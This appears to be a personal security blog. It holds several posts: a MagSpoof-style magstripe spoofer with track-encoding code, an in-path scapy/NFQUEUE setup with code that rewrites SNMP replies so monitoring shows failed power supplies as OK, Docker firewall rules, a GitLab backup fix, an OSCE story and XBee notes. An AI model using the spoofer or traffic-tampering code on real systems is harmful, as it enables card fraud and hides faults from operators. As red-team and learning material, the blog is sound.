Magspoof v4, RedSpoof

Some time ago I came across Samy Kamkar's MagSpoof and thought it would be a very useful tool.

However, the existing implementations weren't mobile enough for me: MagSpoof and MagSpoof v2 themselves are tiny and portable, but I would need an ISP programmer and a computer to change the numbers they emulate.
Other implementations exist. "BlueSpoof" uses a phone and a modified speaker to emulate a magstripe to a card reader, but you have to convert your numbers to a WAV file first.

So I dug a little deeper and found idogendel's write-up on whether the magnetic-reversal feature is really required, plus some more information about magnetic cards.

I decided to build my own implementation and call it "Magic Wand", but after googling that term I found it is an established name in a very different industry :)

So here it is: "RedSpoof", a portable MagSpoof implementation that can be reprogrammed with different numbers over WiFi in a matter of seconds.
It also runs off a standard 5 V USB charger, which makes it perfect for my use case: official red team engagements.

My requirements were:

  • portable
  • easy to configure
  • easy to power: no fancy 3.7 V LiPo with an extra charger that has to be carried around
  • secure: the WiFi should only be enabled when I want to change the numbers being spoofed
  • based on the ledunia (ESP8266), because I got one for free and needed a project for it ;)

Special thanks to Paessler for giving me a free ledunia; without it this project wouldn't have happened. Thank you!

For the portability part I implemented the MagSpoof code in Python (MicroPython), which is perfect for the ledunia.

Further, I reduced the required hardware to a very simple board consisting of:

  • 2 simple push-buttons
  • insulated (enamelled) wire salvaged from a motor, 50 turns around the board, as the coil
  • 1 transistor
  • jumper connectors to attach it to the ledunia

The "attack" workflow looks like this:

  1. Power on: plug it into the power bank (all ledunia LEDs on)
  2. Press the activate button (LEDs glow red)
  3. Hold it close (1-4 cm) to the target reader; the number is spoofed
  4. Press the activate button again to go back to standby, or just unplug it from the battery and plug it back in (all LEDs on)

To change the stored number:

  1. Power on (all ledunia LEDs on)
  2. Press the second button to activate WiFi (LEDs glow blue)
  3. Connect with your phone and change the number; it is stored permanently across reboots
  4. Run through the "attack" workflow


In my test environment it works like a charm. Be careful, though: the BC547 transistor I use gets very hot, because it effectively shorts the coil across the supply. A BC547 is only rated for around 100 mA of collector current, so if you rebuild this, a logic-level MOSFET or a small H-bridge (MagSpoof uses an L293D) is the more robust way to drive the coil.

Feel free to contribute to the design.

The card readers I could get my hands on readily accepted the spoofed numbers for track 1 and track 2, even with alphanumeric track 1 data where other implementations have problems. I couldn't test track 3 yet.

The code is designed to spoof track 1 and track 2 if both are entered. If either track 1 or track 2 is missing, the remaining track is spoofed as track 2, because that is the most important track and the one most readers use to verify numbers.
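As an added example (this is not code from RedSpoof or MagSpoof) of what the firmware has to do with the two tracks, here is the bit-level encoding a magstripe reader expects, together with the decoder you can use to check the result. Track 1 uses 7-bit characters (6 data bits plus odd parity, ASCII 0x20 to 0x5F), track 2 uses 5-bit characters (4 data bits plus odd parity, ASCII 0x30 to 0x3F); every character is sent LSB first, the track is framed by leading and trailing zeros for clock recovery, and an LRC character closes it. The F/2F step shows how those bits turn into the coil reversals the transistor has to drive. The sample track contents are made up.

```python
# Added example: magstripe track encoding as a MagSpoof-style coil driver needs it.
# Not the RedSpoof code; the sample track data below is made up.

TRACK_FORMAT = {        # track number -> (ASCII offset, bits per character incl. parity)
    1: (0x20, 7),       # 6 data bits: ' ' .. '_' (upper-case letters, digits, ^ and /)
    2: (0x30, 5),       # 4 data bits: '0' .. '?' (digits and the sentinels ; = ?)
}
LEADING_ZEROS = 25      # clocking zeros before the start sentinel
TRAILING_ZEROS = 25     # clocking zeros after the LRC


def encode_char(ch, track):
    """Data bits LSB first, followed by one parity bit that makes the number of ones odd."""
    offset, width = TRACK_FORMAT[track]
    code = ord(ch) - offset
    if not 0 <= code < (1 << (width - 1)):
        raise ValueError(f"{ch!r} cannot be encoded on track {track}")
    bits = [(code >> i) & 1 for i in range(width - 1)]
    bits.append(1 ^ (sum(bits) & 1))
    return bits


def encode_track(data, track):
    """Complete bit stream: leading zeros, characters, LRC character, trailing zeros.
    data must include the sentinels itself, e.g. ';...?' for track 2, '%...?' for track 1."""
    offset, _ = TRACK_FORMAT[track]
    bits = [0] * LEADING_ZEROS
    lrc = 0
    for ch in data:
        bits += encode_char(ch, track)
        lrc ^= ord(ch) - offset          # LRC is the XOR of all data codes, incl. sentinels
    bits += encode_char(chr(lrc + offset), track)   # the LRC gets its own parity bit
    bits += [0] * TRAILING_ZEROS
    return bits


def decode_track(bits, track):
    """What a reader does: skip the clocking zeros (both start sentinels begin with a 1 bit),
    read characters until the end sentinel '?', then verify the LRC. Raises ValueError on a bad read."""
    offset, width = TRACK_FORMAT[track]
    i = 0
    while i < len(bits) and bits[i] == 0:
        i += 1
    chars, lrc = [], 0
    while True:
        group = bits[i:i + width]
        if len(group) < width:
            raise ValueError("ran out of bits before the end sentinel")
        if sum(group) % 2 == 0:
            raise ValueError(f"parity error at bit {i}")
        code = sum(b << k for k, b in enumerate(group[:-1]))
        i += width
        if chars and chars[-1] == "?":   # the character after '?' is the LRC
            if code != lrc:
                raise ValueError("LRC mismatch")
            return "".join(chars)
        chars.append(chr(code + offset))
        lrc ^= code


def f2f_reversals(bits):
    """Aiken biphase (F/2F): a flux reversal at the start of every bit cell and an extra one
    in the middle of the cell for a 1. Returns the coil polarity for each half cell, which is
    what a driver toggles the transistor or H-bridge with."""
    polarity, out = 0, []
    for b in bits:
        polarity ^= 1
        out.append(polarity)
        if b:
            polarity ^= 1
        out.append(polarity)
    return out


if __name__ == "__main__":
    track2 = ";1234567890123456=2501101?"        # made-up PAN and expiry
    bits = encode_track(track2, 2)
    print(len(bits), "bits,", len(f2f_reversals(bits)), "half cells ->", decode_track(bits, 2))
```

Two things worth noticing when you compare this with a reader's behaviour: a single flipped bit anywhere in a character breaks that character's parity, so a sloppy coil timing shows up as parity errors long before the LRC is checked, and lowercase letters are simply not representable on track 1, which is why a reader that "has problems with text" is usually being fed characters outside the 0x20 to 0x5F range.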


The Python code is in my GitHub repository:
https://github.com/devBioS/RedSpoof

If you have a fresh ledunia, first install the MicroPython firmware as described here: MicroPython on ESP8266

I use mpfshell to connect to the ledunia and upload new code:

# mpfshell
> open ttyUSB0
> put main.py
> put webserver.py
> put config.py

Unplug the ledunia from the USB port, plug it into a USB charger and check whether the LEDs light up.

If they do, everything should be ready.

Press the WiFi button; the blue LEDs should turn on and you can connect to the web interface at 192.168.4.1.
After saving the configuration the system resets, and you can press the "spoof" button to start spoofing.
Press the "spoof" button again to stop spoofing.

– WARNING –
NEVER connect the ledunia to your computer while the coil board is attached; it could destroy your USB ports!!

– DISCLAIMER –

This project is made for people who want to learn about the insecurity of magnetic card readers.

It is for EDUCATIONAL PURPOSES ONLY.

Please do not do anything illegal with it. I do not endorse any such behaviour.

Red teamers should always have a signed contract that allows this kind of attack against their client. You are responsible for your actions.


If you rebuild it, let me know!

If you make it better, please send me a pull request ;)

docker firewall blocking at the source port

Today I set up my brand new Docker host, started some images and, as usual, tried to set up iptables to restrict the published ports to specific source addresses.

Hours later I had learned that this is not so easy:

  • You cannot use the INPUT chain, because traffic to published ports goes through Docker's standard bridge and is handled in the FORWARD chain.
  • The DOCKER-USER chain (which is part of the FORWARD chain) sees packets after they have been DNAT'ed to the container's port, so if several containers listen on port 8000 internally it gets very complex to find the right one, not to mention containers that are started later.

One example:

I have a Docker image running a web server that listens on port 8000 inside the container, mapped to host port 80 with this config:

ports:
  - "80:8000"

This means my host listens on port 80 and forwards to port 8000 in the container.

The DOCKER-USER chain only sees destination port 8000 (and the container's address), where I could drop some other source IPs.

But I want to open ports selectively and have everything that is not explicitly configured dropped by default, even when somebody spins up new containers.

The Docker documentation and some other sources disable Docker's iptables integration and configure the firewall manually. That works, but it is not what I wanted: those setups either allow general inter-container communication or end up with a VERY complex ruleset that I don't want to have to explain to my administrator colleagues who run the system.


The solution is hidden in the iptables flow diagram:

The PREROUTING chain of the nat table is one of the first chains a packet traverses, and it is where the host's destination port 80 is rewritten to the container's port 8000. The PREROUTING chain of the mangle table runs even earlier, so it still sees the original host port.

So we tag the SYN packets we want to drop in the PREROUTING chain of the mangle table with the MARK target, and later, in the DOCKER-USER chain of the filter table, we drop them accordingly.

My final ruleset looks like this:

#!/bin/bash

# Flush and set up:
/sbin/iptables -F DOCKER-USER
/sbin/iptables -t mangle -F PREROUTING

##############
# Docker conf
##############
# Rules in the nat table are only traversed by the first packet of a connection,
# so we only have to deal with NEW packets here as well.
# MARK 0x1: allowed packet
# MARK 0x2: drop this in the FORWARD (DOCKER-USER) chain
# Mark every new connection coming in on ens3 with 0x2, i.e. block everything by default
/sbin/iptables -t mangle -A PREROUTING -i ens3 -m state --state NEW -j MARK --set-mark 2
###
# Mark the packets we want to allow with 0x1. MARK --set-mark overwrites the
# previous 0x2, so these rules must come AFTER the catch-all rule above.
###
/sbin/iptables -t mangle -A PREROUTING -i ens3 -p tcp -m tcp --dport 80 -s xxx.xxx.xxx.xxx -j MARK --set-mark 1
/sbin/iptables -t mangle -A PREROUTING -i ens3 -p tcp -m tcp --dport 443 -j MARK --set-mark 1

###
# Drop the packets marked with 0x2
###
/sbin/iptables -A DOCKER-USER -m mark --mark 2 -j DROP
/sbin/iptables -A DOCKER-USER -j RETURN

This ruleset allows port 80 from one specific IP address and port 443 from every source IP. Everything else exposed by Docker containers is unreachable from outside: nobody can open a TCP connection, because the initial SYN packets are dropped, and since the catch-all mark rule is protocol-independent the first packet of a UDP flow is dropped as well. Note that the rules are bound to ens3, so traffic arriving on other interfaces is not filtered by them.

And the best part: I can start as many containers as I want on port 8000 and don't have to fiddle with the internal Docker ports.

Hope that helps somebody ;)

Gitlab “file changed as we read it”

Months after the OSCE and my shiny new OSCP certification, a refactoring of the infrastructure and the current build-up of a "Security Operation Center", I'm fully back at work.

My desk is piled high with management documents and other stuff I don't want to read; instead I'm staring at my screen after building a Docker infrastructure including a GitLab server:

root@7845ae79a54c:/# gitlab-rake gitlab:backup:create
Dumping database …
Dumping PostgreSQL database gitlabhq_production … [DONE]
done
Dumping repositories …
done
Dumping uploads …
tar: ./-/….. file changed as we read it
Backup failed

Hmm, great :) The GitLab server is not even a day old, and the backup already doesn't work. Grr.

Long story short, after a lot of googling the problem turned out to be a GlusterFS mount on my Docker host that is bind-mounted into the Docker container: tar compares a file's metadata before and after reading it, and on a replicated Gluster volume successive stat calls can be answered with inconsistent metadata.

The fix: I issued the following commands on my Docker host (the first one just lists the volumes so you can pick the right name, "dockergfs" in my case):

gluster volume info
gluster volume set dockergfs cluster.consistent-metadata on

And after a host reboot (or a remount, as you like), surprise surprise, the backup works now!


If I find some time between my family, my private projects and my daily business, I'll write a review of the OSCP course if there is interest :)

Transparently sniffing and modifying traffic in-path with scapy

I decided to play a little with scapy and looked for something on the internet that would help me sniff and modify traffic without ARP-storming the whole network.

I want to connect a box to eth0 of my computer and the network to eth1, so that I sit between the box and the network.

Note: this does not defeat SSL/TLS right now, but that could be added with the usual tools out there.

The idea is to transparently forward all traffic and only pick out specific packets for modification with scapy.

I did this with a combination of a bridge interface, iptables NFQUEUE and scapy.

First we create a bridge between eth0 and eth1 to transparently forward all traffic:

ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0 eth1
ifconfig br0 up

Bridged frames only pass through the iptables FORWARD chain when the br_netfilter module is loaded and net.bridge.bridge-nf-call-iptables is set to 1; check that with sysctl if the rule below never matches anything.

Second, we need iptables to send the traffic we want to change to an NFQUEUE.
It is important that this rule is added by the scapy script itself on startup (and removed when it exits), so packets are only diverted while the script is running. Packets queued to an NFQUEUE nobody is listening on are dropped, so with the rule in place and the script not running the traffic simply stops (the --queue-bypass option of the NFQUEUE target would let them pass instead).

The line the scapy script has to add is:

iptables -A FORWARD -m physdev --physdev-in eth1 -s 192.168.1.10 -j NFQUEUE

Third, our scapy program picks up those packets, modifies the ones that are of interest and forwards them.
It is important to tell the NFQUEUE handler to also accept the traffic we do not want to modify (e.g. the other SNMP calls in this example), otherwise it never leaves the queue:

https://github.com/devBioS/scapy-mitm

What I actually do is modify a response from the target system to the monitoring system.
I chose the SNMP response of an HP ProLiant power-supply check, which reports whether the power supplies are OK or not (or disconnected):

The "original" says that both power supplies are degraded, in other words they have a problem:

# snmpwalk -v 1 -c public -O eq 192.168.1.10 1.3.6.1.4.1.232.6.2.9.3.1.4
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.1 3
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.2 3

# ./check_psu -H 192.168.1.10
PSU 1 DEGRADED, PSU 2 DEGRADED

After starting the scapy script, it happily turns that into something much better:

#./scapymod.py
Adding iptable rules :
iptables -A FORWARD -m physdev --physdev-in eth1 -s 192.168.1.10 -p udp -j NFQUEUE
[+] Running Main loop
Got a packet ! source ip : 192.168.1.10 dest: 192.168.1.60
Modding...
Old status: 2 (<ASN1_OID['.1.3.6.1.4.1.232.6.2.9.3.1.4.1.1']>)
New status: 2 (OK)
Got a packet ! source ip : 192.168.1.10 dest: 192.168.1.60
Modding...
Old status: 2 (<ASN1_OID['.1.3.6.1.4.1.232.6.2.9.3.1.4.1.2']>)
New status: 2 (OK)

and on the monitoring side:

# snmpwalk -v 1 -c public -O eq 192.168.1.10 1.3.6.1.4.1.232.6.2.9.3.1.4
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.1 2
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.2 2

# ./check_psu -H 192.168.1.10
PSU 1 OK, PSU 2 OK

And all that by carefully crafting and modifying packets.
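The rewriting step above, as an added example that is not the scapy-mitm script from the repository: it works on the raw SNMP bytes with a small BER encoder/decoder, so it runs without scapy or NFQUEUE, and flips the power-supply condition values from 3 (degraded) to 2 (ok) inside an SNMPv1 GetResponse. The OID prefix is the column from the snmpwalk above; the sample response is constructed here, not captured from a server, and everything that is not a GetResponse is passed through unchanged, which is the "accept what you do not modify" rule from the post.

```python
# Added example, not the page's scapy-mitm script: the payload rewrite from the post done
# on the raw SNMP bytes with a small BER encoder/decoder, so it runs without scapy/NFQUEUE.
# The OID prefix is the HP power-supply condition column from the snmpwalk above; the
# sample GetResponse is constructed here, not captured from a server.

TARGET_OID_PREFIX = "1.3.6.1.4.1.232.6.2.9.3.1.4."
DEGRADED, OK = 3, 2
TAG_INT, TAG_OCTETS, TAG_OID, TAG_SEQ, TAG_GETRESPONSE = 0x02, 0x04, 0x06, 0x30, 0xA2

def ber_encode(tag, content):
    """content is bytes, or a list of (tag, content) pairs for constructed types."""
    if isinstance(content, list):
        content = b"".join(ber_encode(t, c) for t, c in content)
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:                                   # long form: 0x80|N, then N length bytes
        body = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(body)]) + body
    return bytes([tag]) + length + content

def ber_decode(buf, pos=0):
    """Return (tag, content, next_pos); constructed tags (bit 0x20 set) give nested lists."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    if tag & 0x20:
        items = []
        while pos < end:
            t, c, pos = ber_decode(buf, pos)
            items.append((t, c))
        return tag, items, end
    return tag, buf[pos:end], end

def int_enc(v):
    return v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True)

def int_dec(b):
    return int.from_bytes(b, "big", signed=True)

def oid_enc(oid):
    parts = [int(x) for x in oid.split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for p in parts[2:]:                     # base 128, high bit set on all but the last byte
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        out += bytes(reversed(chunk))
    return bytes(out)

def oid_dec(b):
    parts, v = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:
        v = (v << 7) | (byte & 0x7F)
        if not byte & 0x80:
            parts.append(v)
            v = 0
    return ".".join(map(str, parts))

def build_response(varbinds, request_id=1, community=b"public"):
    """Constructed SNMPv1 GetResponse with INTEGER values (sample input only)."""
    vbs = [(TAG_SEQ, [(TAG_OID, oid_enc(oid)), (TAG_INT, int_enc(v))]) for oid, v in varbinds]
    pdu = [(TAG_INT, int_enc(request_id)), (TAG_INT, int_enc(0)), (TAG_INT, int_enc(0)), (TAG_SEQ, vbs)]
    return ber_encode(TAG_SEQ, [(TAG_INT, int_enc(0)), (TAG_OCTETS, community), (TAG_GETRESPONSE, pdu)])

def varbind_values(payload):
    """(oid, value) pairs of a GetResponse; non-INTEGER values come back as raw bytes."""
    _, msg, _ = ber_decode(payload)
    vbs = msg[2][1][3][1]                   # message -> PDU -> variable-bindings list
    return [(oid_dec(o[1]), int_dec(v[1]) if v[0] == TAG_INT else v[1]) for _, (o, v) in vbs]

def rewrite_response(payload, prefix=TARGET_OID_PREFIX, old=DEGRADED, new=OK):
    """Return (payload, changed_oids). Anything that is not a GetResponse passes untouched."""
    tag, msg, _ = ber_decode(payload)
    if tag != TAG_SEQ or len(msg) != 3 or msg[2][0] != TAG_GETRESPONSE:
        return payload, []
    version, community, (_, pdu) = msg
    req_id, err_status, err_index, (_, vbs) = pdu
    changed, new_vbs = [], []
    for _, (oid_item, val_item) in vbs:
        oid = oid_dec(oid_item[1])
        if oid.startswith(prefix) and val_item[0] == TAG_INT and int_dec(val_item[1]) == old:
            val_item = (TAG_INT, int_enc(new))
            changed.append(oid)
        new_vbs.append((TAG_SEQ, [oid_item, val_item]))
    pdu = [req_id, err_status, err_index, (TAG_SEQ, new_vbs)]
    return ber_encode(TAG_SEQ, [version, community, (TAG_GETRESPONSE, pdu)]), changed

OID_PSU1 = "1.3.6.1.4.1.232.6.2.9.3.1.4.1.1"
OID_PSU2 = "1.3.6.1.4.1.232.6.2.9.3.1.4.1.2"
SAMPLE = build_response([(OID_PSU1, DEGRADED), (OID_PSU2, DEGRADED)])   # both PSUs "degraded"
```

In the in-path setup from the post you would call rewrite_response() on the UDP payload of the packet taken out of the NFQUEUE and then repair the checksums before accepting it: with scapy that means deleting the IP and UDP checksum (and length) fields so they are recomputed on rebuild, without scapy you recompute the UDP checksum yourself or set it to 0, which IPv4 permits. Here the replacement value has the same encoded size as the original, so the packet length does not change; a value that needs more bytes would also change the IP and UDP lengths, which the re-encoding above handles on the SNMP side but the packet headers still have to follow.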

Have Phun :)

My OSCE / CTP Story

It has been quite a long time since my last post. That is simply because my family and my job have been taking up all my time for the last few years ;) Last month I found that I needed to challenge myself, and I had wished for a long time to get a technical certification in the security sector.

My last certification was quite a while ago and was a QualysGuard certification, so I searched the internet for an adequate challenge to take.

After reading some blogs I found that the certifications from
http://www.offensive-security.com seemed to be really challenging, even for people who have worked for years as pentesters.
A bit of reading on the Offensive Security website stated:

"... widely regarded as one of the most respected and difficult to obtain technical information security certifications available, the OSCE is the industry premier advanced penetration testing certification.
Holders of this certification are part of an elite group who have proven they have what it takes to be among the best and brightest in the field."

Hmm, such a statement from such a respected company...
I thought this could be really challenging.
So I decided to give Cracking the Perimeter and the resulting Offensive Security Certified Expert (OSCE) a shot.

That said, I found myself over at fc4.me, the registration challenge for the CTP course.

The first few steps of http://fc4.me were quite easy, just because I had managed to get through a few levels over at http://3564020356.org years ago and still remembered them; the rest you can figure out yourself :)

Please be aware that I will not give any hints on the registration challenge, the course or the exam.

The exam is so hard that if you cannot make it yourself and need hints from anybody, you are cheating and have not deserved the certificate.

- the CTP course -

You have the option to register for 30 or 60 days. I chose 60 days and planned to take my exam after about 45 days; if I could not achieve it, I could work in the lab for another 15 days and try again.

If you need other information about the course itself, give Google a shot; there are plenty of reviews of the CTP course.

Of course nothing you plan for your life happens exactly the way you planned it.

I wanted to schedule my exam for 15 April, but on Friday 2016-03-25 my utility provider dropped a letter saying they would dig up the whole street where I live to maintain power, gas and water for 15 WEEKS, starting 15 April.

Damn it, so I could not rely on a stable internet connection for the whole 48 hours of the exam.

I then found an exam slot on Monday 28 March, yes, 2 days after I received the letter from the utility company.

I scheduled the exam for that date...

As stated before, nothing you plan goes exactly that way: everything seemed to be working against me, and my whole family fell sick in the night before Monday >:(

Nothing I could do; I couldn't reschedule the exam and had to do it now.

- the exam -

I can't tell you how nervous I was. I had created a lot of scripts beforehand for the places where I thought Offsec would put stones in my way. I even learned a bit of Python, as I wanted to get everything I could out of the course.

The exam consists of 4 challenges, 2 worth more points and 2 worth fewer.

I started with the smaller ones, where even my scripts came in handy, so my nervousness faded.
7 hours later I had 3 out of 4 challenges done.

I had started the exam at 16:00, and now it was 1 o'clock. I went to my first sleep.
I woke up at 8 AM, got a coffee and immediately headed over to the last challenge.

This challenge could be broken into 2 parts, and after some fiddling I got the first part working after two hours or so.
But then this one took everything out of me: I couldn't get it to do what I wanted. I worked really hard, with some little breaks to regain consciousness.
I found several ways that *could* work, but none of them did in the end, and I started to get frustrated.

By now it was 02:00 AM and I went to bed again; I couldn't do any more.

After a horrible sleep I woke up and the first thing that came to my mind was:
"T-R-Y   H-A-R-D-E-R!"
Okay, got a coffee. More ideas came...
5 hours later I was really torn between hope and desperation.
It was now 13:00 and I was getting ready to fail at the last step of the exam.

But not me: I kept shooting at the dev target as much as I could and baaam!
Out of nowhere my last idea worked!

Now I got really nervous again: I had to hack all my findings together in a working manner and circumvent some little problems, but I managed to get everything up and working 2 hours before the end of the exam.

Now I was ready to go against the objective, and on the first attempt it worked!

YEAH, I was so happy that I screamed around and really felt like a hero.

I hacked together my documentation of everything, for which I had another 24 hours after the exam, but I needed to know whether I had passed or not. I had invested so much hard thinking that I couldn't wait for the result.

After 2 days I got the verdict:

We are happy to inform you that you have successfully completed the Cracking the Perimeter certification exam and have obtained your Offensive Security Certified Expert (OSCE) certification

And they even sent me a nice image to include in my online activities.

In the end I was sooo close to giving up, but the moment when you overcome this feeling and get it working is what everybody out there means with the words "try harder": with enough persistence everything is possible.

Thank you Offensive Security for this mind-blowing course and for letting me experience success and failure; this was the hardest thing I have ever done under time pressure!

Really, I need to thank my 2 kids and my wife: they were sick but managed not to disturb me during the whole 3 days I took the exam. Thank you :) Love you ;)

Now the next step is to recover from this and to get my family healthy again ;)

XBEE Ready.

In my last posts I showed you that I use the XBee series to play around a little.

First of all I tried to design a system that would let me realise my home automation.

I wanted to include the XBee system, as it not only saves me cables but also enables freaky wireless stuff like remotely opening my door or alerting all XBee nodes at the same time when a burglar is trying to do his work.

I had the following things in mind:

  • XBee devices all over the house, encryption on, connected to a micro like the ATmega32 or standalone (for my letterbox)
  • The coordinator is hooked up to a Linux system so I can take control from there
  • The XBees should communicate with each other; the computer is just passive

So this is what I need:

1. XBees in API mode
This is a must, as only in this mode is fast addressing possible.

2. Linux system connected to the coordinator via FTDI

I had the standard ftdi_sio module loaded with the connected FTDI 232BL; it gets recognised and I can communicate with the XBee.
After a while I can still write to the XBee, but my subsequent reads don't return anything.

While I debugged and changed my code over two months, I found the problem: the FTDI chip or the ftdi_sio driver.
I was using Perl, threads and a lot of other stuff I had never used before and searched for the problem there, but I didn't find anything.
A quick test with a standard RS232 converter + XBee showed that my code is completely OK. >:[ D-A-M-N

3. Preferably a Perl script that runs as a server
So more than one "client" can connect to it and control everything; for example, a recurring Linux cron job checking the temperature and a "GUI" user interface on Windows should not disturb each other and both should work at the same time.

4. XBees connected to an ATmega32
No problems here, the ATmega32 has a serial interface.

5. ATmega32 API
This was not too hard to write, but the memory management is tricky.
I learned that I can even overwrite my memory with BASCOM, so that is no longer an excuse not to use C ^^
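As an added example (not code from this post, whose server side was written in Perl), here is the XBee API frame format that points 1 and 5 depend on, including the checksum that lets you tell a corrupted read apart from a serial driver that simply returns nothing, which is exactly the symptom in point 2. Frame layout and the ZigBee Transmit Request (0x10) field order follow the XBee API documentation; the addresses and payloads are made up, and only API mode 1 (AP=1, no byte escaping) is handled.

```python
# Added example, not code from the post: XBee API frames with checksum verification and a
# ZigBee Transmit Request builder. Addresses and payloads are made up; AP=1 framing only
# (AP=2 additionally escapes 0x7E, 0x7D, 0x11 and 0x13 inside the frame).

START = 0x7E


def build_frame(frame_data):
    """0x7E | 16-bit big-endian length | frame data | checksum, checksum = 0xFF - (sum(data) & 0xFF)."""
    frame_data = bytes(frame_data)
    checksum = 0xFF - (sum(frame_data) & 0xFF)
    return bytes([START]) + len(frame_data).to_bytes(2, "big") + frame_data + bytes([checksum])


def parse_frame(buf):
    """Return (frame_data, bytes_consumed) for the first complete frame in buf, or (None, 0)
    if more bytes are needed. Raises ValueError when the checksum does not add up."""
    start = buf.find(bytes([START]))
    if start < 0 or len(buf) < start + 3:
        return None, 0
    length = int.from_bytes(buf[start + 1:start + 3], "big")
    end = start + 3 + length + 1                     # + checksum byte
    if len(buf) < end:
        return None, 0
    data = bytes(buf[start + 3:end - 1])
    if (sum(data) + buf[end - 1]) & 0xFF != 0xFF:   # data plus checksum must sum to 0xFF
        raise ValueError("checksum mismatch")
    return data, end


def zigbee_tx_request(frame_id, dest64, payload, dest16=0xFFFE, radius=0, options=0):
    """ZigBee Transmit Request (frame type 0x10). dest16=0xFFFE means 'unknown, let the radio
    resolve it'; dest64=0x000000000000FFFF would broadcast to every node."""
    data = (bytes([0x10, frame_id]) + dest64.to_bytes(8, "big") + dest16.to_bytes(2, "big")
            + bytes([radius, options]) + bytes(payload))
    return build_frame(data)


def read_frames(stream):
    """Split a serial byte stream into frames, skipping garbage before a start byte; returns
    the list of frame data and the unconsumed tail (a partially received frame, if any)."""
    frames, buf = [], bytes(stream)
    while True:
        data, used = parse_frame(buf)
        if data is None:
            return frames, buf
        frames.append(data)
        buf = buf[used:]
```

A checksum failure from parse_frame() means bytes were lost or corrupted on the serial link, whereas a read that returns nothing at all (buffer never completes a frame) points at the driver or the device, which is the distinction that would have saved the two months of debugging described above. Note that a stray 0x7E inside garbage is taken as a start byte; in that case the bogus length makes parse_frame() wait for more bytes or fail the checksum, so a real receiver should time out and resynchronise on the next 0x7E.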


This was written about two years ago. In the meantime I built a system exactly like this one, wrote a Perl server and connected the XBees.

Everything was fine until one day all XBees lost their connection to the coordinator without an obvious reason.

I'm still investigating why the radio chips lose their connection; sometimes it takes 3-4 weeks, sometimes they lose it every hour.

I'm really disappointed about the reliability of those XBees. I thought they would reconnect to other routers, but it seems that an XBee sticks to its parent forever.

I had written a Perl server with Jabber and network integration for the system, but I discarded it.
At the moment I'm concentrating on an FHEM implementation, as I started to move over to HomeMatic :)

More to come..


ESXi 5: Expanding datastore by extending local array

Recently I extended my RAID 5 array by replacing the HDDs one by one with bigger ones and waiting for each rebuild to finish.

All the instructions are executed on an HP DL360 G6 with a SmartArray P410i controller with only one logical disk.

It is highly recommended that you back up all your VMs before executing a single command. Everything worked fine for me, but one error in a command could lead to a complete loss of all data!

Continue reading "ESXi 5: Expanding datastore by extending local array"